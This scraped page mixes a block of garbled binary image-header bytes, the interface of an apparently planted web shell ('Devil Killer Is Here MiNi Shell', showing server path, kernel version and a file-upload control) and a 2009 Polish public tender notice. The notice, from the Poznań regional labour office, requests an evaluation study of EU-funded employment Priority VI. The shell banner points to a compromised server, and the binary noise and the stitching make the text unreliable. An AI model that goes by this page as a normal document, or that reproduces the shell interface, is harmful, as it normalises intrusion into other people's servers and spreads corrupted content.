JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090714/111607-N-2009.html

<p class="kh_header"><b>Poznań: Przeprowadzenie badania ewaluacyjnego pt. Analiza postępów wdrażania Priorytetu VI PO KL.</b><br>
<b>Numer ogłoszenia: 111607 - 2009; data zamieszczenia: 14.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 061 8463819, faks 061 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie badania ewaluacyjnego pt. Analiza postępów wdrażania Priorytetu VI PO KL..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyłonienie Wykonawcy w zakresie Przeprowadzenia badania ewaluacyjnego pt: Analiza postępów wdrażania Priorytetu VI PO KL.

Wstęp
Program Operacyjny Kapitał Ludzki stanowi odpowiedź na wyzwania, jakie przed państwami członkowskimi UE, w tym również Polską, stawia odnowiona Strategia Lizbońska. Do wyzwań tych należą: uczynienie z Europy bardziej atrakcyjnego miejsca do lokowania inwestycji i podejmowania pracy, rozwijanie wiedzy i innowacji oraz tworzenie większej liczby trwałych miejsc pracy. Zgodnie z założeniami Strategii Lizbońskiej oraz celami polityki spójności krajów unijnych, rozwój kapitału ludzkiego i społecznego przyczynia się do pełniejszego wykorzystania zasobów pracy oraz wsparcia wzrostu konkurencyjności gospodarki.
Dążąc do efektywnego rozwoju zasobów ludzkich, Program koncentruje wsparcie na następujących obszarach: zatrudnienie, edukacja, integracja społeczna, rozwój potencjału adaptacyjnego pracowników i przedsiębiorstw, a także na zagadnieniach związanych z rozwojem zasobów ludzkich na terenach wiejskich, budową sprawnej i skutecznej administracji publicznej wszystkich szczebli, wdrażaniem zasady dobrego rządzenia oraz promocją zdrowia zasobów pracy.
Celem głównym Programu jest: umożliwienie pełnego wykorzystania potencjału zasobów ludzkich, poprzez wzrost zatrudnienia i potencjału adaptacyjnego przedsiębiorstw i ich pracowników, podniesienie poziomu wykształcenia społeczeństwa, zmniejszenie obszarów wykluczenia społecznego oraz wsparcie dla budowy struktur administracyjnych państwa.
Program składa się z 10 Priorytetów, realizowanych zarówno na poziomie centralnym jak i regionalnym. W ramach komponentu centralnego środki zostaną przeznaczone przede wszystkim na wsparcie efektywności struktur i systemów instytucjonalnych, natomiast środki komponentu regionalnego zostaną przeznaczone na wsparcie dla osób i grup społecznych.
W województwie wielkopolskim funkcję Instytucji Pośredniczącej pełni Wojewódzki Urząd Pracy w Poznaniu.

Priorytet VI (Rynek pracy otwarty dla wszystkich) obejmuje działania związane z aktywizacją zawodową osób bezrobotnych i biernych zawodowo. Pomoc kierowana jest m.in. do osób młodych, kobiet, osób starszych i niepełnosprawnych oraz osób długotrwale bezrobotnych. W ramach Priorytetu VI znajdują się działania prowadzące do zmniejszenia bezrobocia ukrytego, dotykającego najbardziej mieszkańców obszarów wiejskich. Pomoc skoncentrowana jest na podnoszeniu zdolności do zatrudnienia (m.in. poprzez doradztwo zawodowe i szkolenia), rozwoju przedsiębiorczości i szkoleniach oraz na podniesieniu jakości usług świadczonych przez instytucje rynku pracy. 
W ramach Priorytetu VI wyróżniono następujące Działania i Poddziałania:
- 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie,
- 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy (projekty konkursowe),
- 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie (projekty konkursowe dla PUP i WUP),
 -6.1.3. Poprawa zdolności do zatrudniania oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych (projekty systemowe),
- 6.2 Wsparcie oraz promocja przedsiębiorczości oraz samozatrudnienia (projekty konkursowe),
- 6.3 Inicjatywy lokalne na rzecz podnoszenia poziomu aktywności zawodowej na obszarach wiejskich (projekty konkursowe).

Priorytet VII (Promocja integracji społecznej) ma na celu ułatwienie dostępu do rynku pracy osobom zagrożonym wykluczeniem społecznym oraz rozwój instytucji ekonomii społecznej. Grupami docelowymi są osoby niepełnosprawne, długotrwale bezrobotne, imigranci, osoby opuszczające zakłady karne. Wsparcie przeznaczone jest na wyeliminowanie barier, jakie napotykają te grupy w dostępie do zatrudnienia, na tworzenie warunków sprzyjających zatrudnieniu oraz na podniesienie kwalifikacji kadr instytucji pomocy i integracji społecznej. 

W ramach Priorytetu VIII (Regionalne Kadry Gospodarki) wsparciem objęte są przedsiębiorstwa i pracownicy w nich zatrudnieni, którym zapewni się możliwość podnoszenia i aktualizacji umiejętności zawodowych. Ważnym elementem wsparcia jest także rozwój Regionalnych Strategii Innowacji oraz zapewnienie transferu wiedzy między przedsiębiorstwami a jednostkami naukowo-badawczymi.

Priorytet IX (Rozwój wykształcenia i kompetencji w regionach) kładzie nacisk na dostęp do edukacji oraz wyrównanie szans edukacyjnych. Działania obejmują upowszechnienie edukacji przedszkolnej (głownie na obszarach wiejskich), programy rozwojowe szkół (np. dodatkowe zajęcia pozalekcyjne), dostosowanie wiedzy i umiejętności absolwentów do potrzeb lokalnego rynku pracy, rozwijanie szkolnictwa zawodowego, programy stypendialne, upowszechnienie kształcenia ustawicznego oraz rozwój kadr pedagogicznych i administracyjnych systemu oświaty. 

Program Operacyjny Kapitał Ludzki finansowany jest w 85% ze środków Unii Europejskiej (Europejskiego Funduszu Społecznego) oraz w 15% ze środków krajowych. Całość kwoty, jaką przewidziano na realizację Programu, wynosi prawie 11,5 mld euro, w tym wkład finansowy Europejskiego Funduszu Społecznego to ponad 9,7 mld euro.
Za efekty realizacji założeń komponentu regionalnego PO KL odpowiedzialne są: Wydział Koordynacji i Kontroli PO KL oraz Wydział Obsługi Projektów PO KL Wojewódzkiego Urzędu Pracy w Poznaniu. 
W ramach Wydziału Kontroli i Koordynacji działają cztery Oddziały: ds. Kontroli, Ewaluacji i Rozliczeń Finansowych, Informacji i Pomocy Technicznej oraz Programowania. Poszczególne Oddziały w ramach Wydziału zajmują się:
-kontrolą poprawności stosowania procedur i weryfikacją prawidłowości realizacji projektów oraz kontrolą wydatków poniesionych w ramach projektu;
-monitorowaniem wdrażania komponentu regionalnego i realizacji założonych wskaźników oraz osiągniętego poziomu alokacji w rozbiciu na poszczególne lata realizacji PO KL w Wielkopolsce oraz refundacją i prognozami finansowymi;
-Pomocą Techniczną PO KL i obsługą projektów własnych oraz informacją i promocją EFS;
-rozpatrywaniem protestów, prowadzeniem sekretariatu PKM oraz opracowywaniem procedur.
W ramach Wydziału Obsługi Projektów działają Oddziały dla Priorytetów VI-IX odpowiadające za obsługę finansową i ogólną projektów. W ramach każdego Oddziału dla Priorytetu działają trzy zespoły zadaniowe:
-Zespół ds. obsługi finansowej ( I etap weryfikacji),
-Zespół ds. obsługi finansowej (II etap weryfikacji),
-Zespół ds. ogólnej obsługi projektów.

Badanie ewaluacyjne pozwoli określić postępy we wdrażaniu Priorytetu VI oraz wytyczyć kierunki umożliwiające bardziej efektywne wdrażanie oraz wprowadzenie usprawnień we wdrażaniu Priorytetu VI. Badanie pozwoli również zidentyfikować wąskie gardła systemowe zarówno te występujące, jak i potencjalne. Wyniki ewaluacji posłużą również do sformułowania działań zaradczych lub naprawczych oraz niwelujących skutki występowania wąskich gardeł systemowych.
Odbiorcą raportu końcowego będą między innymi następujące podmioty:
-Instytucja Pośrednicząca PO KL;
-Publiczne Służby Zatrudnienia;
-Beneficjenci oraz potencjalni Beneficjenci.

Cele badania 
Główne cele badania ewaluacyjnego to: 
-Diagnoza stanu zakontraktowania i rozliczania środków finansowych z założoną w Planie Działania wartością alokacji na lata 2007-2008;
-Dynamika kontraktowania/wydatkowania oraz rozliczania środków z EFS w ramach Działań Priorytetu VI; 
-Zdiagnozowanie wąskich gardeł we wdrażaniu Działań Priorytetu VI oraz kontraktowaniu/rozliczaniu środków;
- Sformułowanie mechanizmów i działań mających zapobiec tworzeniu się wąskich gardeł  we wdrażaniu i rozliczaniu projektów oraz usunięcie już istniejących;
-Prognoza osiągania założonych celów Priorytetu VI w kontekście regionalnym w warunkach zmian społeczno - gospodarczych spowodowanych globalnym kryzysem ekonomicznym.
Od wykonawcy oczekuje się zaproponowania celów szczegółowych korespondujących z głównymi celami badania oraz uzyskania odpowiedzi na poniższe oraz dodane pytania ewaluacyjne:
-Jak kształtuje się poziom kontraktacji w poszczególnych Poddziałaniach Priorytetu VI? Które Działania, Poddziałania mają najwyższy poziom kontraktacji? 
-Jakie czynniki wpłynęły, wpływają na poziom kontraktacji?
-Jak w rozbiciu na Poddziałania Priorytetu VI prezentuje się dynamika kontraktacji?
-W którym Poddziałaniu kontraktacja przebiega najsprawniej?
-W którym Poddziałaniu kontraktacja przebiega najmniej sprawnie?
-W jaki sposób można usprawnić proces kontraktacji środków? Jakie czynniki są kluczowe dla prowadzenia sprawnej kontraktacji?
-W których Poddziałaniach Priorytetu VI występują, występowały problemy? Z czego one wynikają ? Czy pojawiające się utrudnienia leżą po stronie IP czy po stronie Beneficjentów?
-Jak kształtuje się poziom wydatkowania środków w ramach poszczególnych Działań, Poddziałań?
-Jak wygląda rozliczanie środków w ramach projektów przez Beneficjentów  z perspektywy IP? Jak wygląda rozliczanie środków przez IP z perspektywy Beneficjentów? 
-Na czym polegają najczęstsze problemy popełniane przy rozliczaniu środków przez Beneficjentów? Jakie problemy na tym etapie najczęściej występują w IP?
-Czy istnieje ryzyko związane z nieosiągnięciem celu w zakresie wydatkowania środków przez IP? Jakie czynniki mają największy wpływ na sprawne wydatkowanie środków?
-Gdzie występują problemy (na etapie rozliczania środków), które z nich są najczęstsze? Czy można im jakoś przeciwdziałać?
-Czy Beneficjenci mają problemy z rozliczaniem środków? Jakie, jakiego rodzaju są to problemy? Z czym są największe problemy na tym etapie? Jak można pomóc Beneficjentom na tym etapie?
-Jakie są najczęściej popełniane błędy we wnioskach o płatność oraz występujące nieprawidłowości na etapie weryfikacji wniosku o płatność oraz kontroli?
-Jaki jest średni czas od momentu wpływu wniosku do WUP do momentu zatwierdzenia przez IP w danym Poddziałaniu?
-Czy połączenie części finansowej z postępem rzeczowym oraz PEFS wpływa pozytywnie na wdrażanie Priorytetu?
-Jak kształtuje się postęp rzeczowy i finansowy w poszczególnych Poddziałaniach? Czy te dwa elementy współgrają ze sobą?
-Czy Beneficjenci realizują założone pierwotnie we wniosku o dofinansowanie cele?
-Czy Beneficjenci mają problemy w uzyskaniu wsparcia w ramach Priorytetu VI? Z czym mają największe problemy? W jaki sposób można im pomóc?
-Na jakim etapie występują wąskie gardła systemowe - czy jest to etap kontraktacji czy rozliczania środków? Czy te wąskie gardła systemowe zagrażają wdrażaniu Priorytetu VI?
-Czy wąskie gardła systemowe zagrażają osiągnięciu wskaźników? W których Poddziałaniach to zagrożenie jest największe?
-Czy konsekwencje utrudnień wynikających z występowania wąskich gardeł systemowych są poważne? Czy można je zniwelować przy użyciu dostępnych rozwiązań czy konieczne są działania przekraczające kompetencje WUPu?
-W jaki sposób można by je usunąć lub udrożnić?
-Jak wygląda dostępność szkoleń z punktu widzenia B.O Priorytetu VI? Skąd czerpali wiedzę o szkoleniach? Czy łatwo było się zapisać na szkolenie? Czy w ich środowisku było wielu chętnych na takie szkolenia? Czy byli zadowoleni z formy pomocy jaką otrzymali?
-Czy formy pomocy możliwe do realizacji w ramach Priorytetu VI są skuteczne? Które formy są najskuteczniejsze? 
-Jakie skutki wdrażania Priorytetu VI można aktualnie obserwować?
-Jak przebiegają linie demarkacyjne między Poddziałaniami  6.1.1 a 6.1.3 i czy istnieje niebezpieczeństwo nakładania się tych działań?
-Czy można znaleźć (jeśli tak, to jakie) przykłady komplementarności projektów finansowanych z innych  źródeł niż EFS?
-Czy Działania zaplanowane w ramach Priorytetu VI odpowiadają na wyzwania spowodowane kryzysem gospodarczym?
-Czy w związku z sytuacją gospodarczo - społeczną istnieje potrzeba dokonania przesunięć środków w ramach Poddziałań? W ramach których Poddziałań powinny zostać przesunięte środki? W jakim zakresie?
-Czy w ramach projektów finansowanych z Priorytetu VI jest stosowana w praktyce zasada równości płci podczas realizacji projektów?
Wykonawca może zaproponować modyfikację powyższych pytań badawczych (przy założeniu, że zabieg ten umożliwi skuteczniejsze pozyskanie materiału badawczego lub rozszerzy zakres badania).

W badaniu uwzględnione zostaną kryteria:
Skuteczność- kryterium to pozwoli ocenić jak kształtuje się wydatkowanie w stosunku do środków zabezpieczonych na rok 2007-2008 (alokacji) w ramach Priorytetu VI.
Efektywność - kryterium to pozwala ocenić ekonomiczność instytucji w zakresie kontraktowania i rozliczania przez Priorytet VI środków finansowych w stosunku do alokacji założonej w Planie Działania na lata 2007-2008 oraz w przeliczeniu na pierwszy kwartał 2009 roku.
Wyniki ewaluacji służyć będą usprawnieniu wdrażania Priorytetu VI oraz usprawnieniu kontraktowania i rozliczania środków finansowych, a także polepszeniu dynamiki osiągania wskaźników.

Metodologia
Zamawiający wymaga zastosowania co najmniej następujących technik:
-Desk research,
-CATI (Beneficjenci),
-Ankiety PAPI (Beneficjenci Ostateczni),
-Wywiady kwestionariuszowe F2F (Pracownicy Priorytetu VI, Zespół ds. refundacji i prognoz finansowych, Wydział Finansowo-Księgowy, Zespół ds. monitorowania i obsługi baz danych),
-Focus FGI (Pracownicy jak powyżej).
Zamawiający wymaga zastosowania doboru próby umożliwiającego uzyskanie próby reprezentatywnej dla F2F, PAPI, CATI.
Wykonawca może uzupełnić listę metod badawczych lub zaproponować jej modyfikację (przy założeniu, że zabieg ten umożliwi skuteczniejsze pozyskanie odpowiedzi na pytania badawcze). Wykonawca może również zaproponować zastosowanie innych technik badawczych, jednak ostateczna decyzja dotycząca zastosowanej metodologii pozostaje w gestii Zamawiającego. Wykonawca przedstawi do konsultacji i akceptacji Zamawiającego narzędzia badawcze (w razie potrzeby Zamawiający weźmie udział w pilotażu narzędzi).
Od Wykonawcy wymaga się przedstawienia metod analizy statystycznej uzyskanych danych. 
Zamawiający wymaga, aby Wykonawca przedstawił model badania uwzględniający cele badania, pytania badawcze wraz z przyporządkowanymi metodami i technikami badawczymi oraz z kryteriami ewaluacyjnymi. 

Harmonogram 
Zamawiający oczekuje od Wykonawcy terminowego i regularnego raportowania. 
Wykonawca zobowiązany jest do przedstawienia raportu wstępnego do 14 dni kalendarzowych od terminu podpisania umowy. Wykonawca zobowiązany jest do przedstawienia do konsultacji założeń raportu metodologicznego w terminie 7 dni kalendarzowych od daty podpisania umowy. Raport powinien zawierać dokładny opis narzędzi badawczych oraz proponowany sposób doboru próby. 
Wstępny raport końcowy powinien interpretować zebrane wyniki. Zestawienie i porównanie danych powinno być ujęte w tabelach porównawczych. Dla weryfikacji hipotez i oszacowania efektów należy zastosować metody statystyczne i porównawcze. 
We wstępnej wersji raportu końcowego należy przedstawić roboczą analizę materiału badawczego uwzględniającą cele badania oraz wszystkie szczegółowe pytania ewaluacyjne. Oczekuje się, że raport ewaluacyjny będzie się kończył sformułowaniem wstępnych wniosków i rekomendacji (w formie tabeli). 
W czasie pisania raportów z przeprowadzonego badania wskazane są konsultacje z Zespołem ds. ewaluacji w Oddziale Ewaluacji i Rozliczeń Finansowych (istnieje możliwość regularnych spotkań). Zamawiający zastrzega sobie prawo konsultacji i zatwierdzania narzędzi badawczych oraz udziału w pilotażu narzędzi. Zamawiający będzie informowany o aktualnym stanie prac przez reprezentanta Wykonawcy, wybranego do kontaktu z Zamawiającym. 
Jednocześnie Zamawiający zaznacza, że terminy przekazania kolejnych raportów nie mogą ulec zmianie. 

Etapy realizacji badania	Termin realizacji
Przedstawienie raportu wstępnego, metodologicznego	Do 14 dni od terminu podpisania umowy 
Przedstawienie wstępnej wersji raportu końcowego 	Do 25 września 2009 r. 
Przedstawienie ostatecznej wersji raportu końcowego	Do 16 października 2009 r. 

Raport końcowy powinien mieć następującą strukturę:
-Streszczenie (10 stronicowe streszczenie głównych obserwacji, wniosków i rekomendacji);
-Spis treści;
-Wprowadzenie (opis przedmiotu badania, jego założeń i celów);
-Opis zastosowanej metodologii (w tym opis próby badawczej);
-Opis wyników badania ewaluacyjnego (analiza, interpretacja i prezentacja wyników w podziale na subregiony z uwzględnieniem powiatów);
-Wnioski i rekomendacje (przy każdym powinien znaleźć się odnośnik do konkretnej części raportu, czyli jego uzasadnienia w tekście; rekomendacje powinny być pogrupowane tematycznie oraz zawierać opis pożądanego stanu i propozycje sposobów osiągnięcia tego stanu; wyniki badania powinny być przedstawiane w formie tabeli, w której zamieszczone będą główne problemy i opis działań, które pozwoliłyby na rozwiązanie tych problemów. Zatem - powinny odpowiadać na następujące pytania: Jak powinna wyglądać rzeczywistość? Jaka zmiana powinna zostać dokonana? Co należy zrobić, by osiągnąć pożądany stan? Co należy zrobić, by przeprowadzić pożądaną zmianę?);
-Aneksy (zestawienia i porównania danych, narzędzia badawcze, zastosowane źródła).

Raport końcowy wraz ze streszczeniem nie powinien liczyć więcej niż 70 stron i mieć formę publikacji. Powinien być napisany zwięzłym i przejrzystym językiem. Sugeruje się, aby każdy z rozdziałów kończył się krótkim podsumowaniem. Do raportu powinno być dołączone resume, w którym zebrane będą najistotniejsze wyniki i rekomendacje.
Wykonawca powinien dostarczyć:
-raport w wersji elektronicznej (e-mail, CD-ROM) i papierowej (10 egzemplarzy w formie publikacji);  
-streszczenie najważniejszych wyników i rekomendacji (w przypadku wersji elektronicznej - w formie osobnego pliku);
-streszczenie raportu w języku angielskim; 
-prezentację multimedialną prezentującą wyniki badania (dodatkowo Wykonawca przedstawi wyniki badań oraz rekomendacje na spotkaniu wskazanym przez Zamawiającego).

Zakres dostępnych informacji
Badanie powinno się opierać na: analizie dokumentów programowych PO KL, statystykach publicznych, dokumentach wewnętrznych IP, a także na danych uzyskanych za pomocą metod badawczych określonych w dokumencie lub dodatkowo zaproponowanych przez Wykonawcę. Zlecający zapewnia bazę PEFS zawierającą dane Beneficjentów Ostatecznych, którzy ukończyli udział w projektach.
Wykonawca zobowiązany jest do korzystania z dodatkowych dokumentów, informacji, które mogą być niezbędne do prawidłowej realizacji badania. Niniejsze dokumenty powinny zostać określone i zgromadzone przez Wykonawcę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.	spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn.:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2.	Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia i dokumentów opisanych w rozdziale 6) niniejszej SIWZ, według formuły spełnia-nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ustawy Pzp i niepodleganiu wykluczeniu na podstawie art. 24 ustawy Pzp, wedle wzoru stanowiącego załącznik nr 1 do formularza oferty; w przypadku, gdy ofertę składa kilka podmiotów dotyczy to każdego z nich, w tym każdego członka konsorcjum.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie, dotyczy to każdego z nich;
3. Aktualne na dzień składania ofert zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
o niezaleganiu z opłatami oraz składkami na ubezpieczenie zdrowotne lub społeczne lub o uzyskaniu zgody na zwolnienie, odroczenie lub rozłożenie na raty zaległych opłat i składek (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich. 
4. Aktualne na dzień składania ofert zaświadczenie od właściwego naczelnika Urzędu Skarbowego o niezaleganiu z opłacaniem podatków lub o uzyskaniu zgody na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
5. Wykonawca (w przypadku konsorcjum co najmniej jeden z Wykonawców)  musi wykazać, w formie załączonego do oferty oświadczenia,  że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, licząc wstecz od upływu terminu składania ofert wykonał, tj. zrealizował co najmniej dwie ewaluacje o charakterze zewnętrznym (niezależne od podmiotu ewaluacji, finansowane ze środków publicznych) oraz co najmniej jedno badanie społeczne (załącznik nr 2 do formularza oferty). Oświadczenie powinno zawierać nazwę i dane identyfikujące zleceniodawców, opis zakresu zamówień, terminy ich wykonania oraz wartości. Ponadto powinno być potwierdzone stosownym dokumentem uprzedniego zleceniodawcy o należytym wykonaniu zamówienia. 
6. Wykonawca musi przedstawić wykaz osób, którym dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (załącznik nr 3 do formularza oferty). Każdy członek zespołu powinien posiadać niezbędną wiedzę z zakresu PO KL lub programów finansowanych z EFS.
7. Wykonawca musi złożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 6, wykonawca wskazał osoby, którymi będzie dysponował.
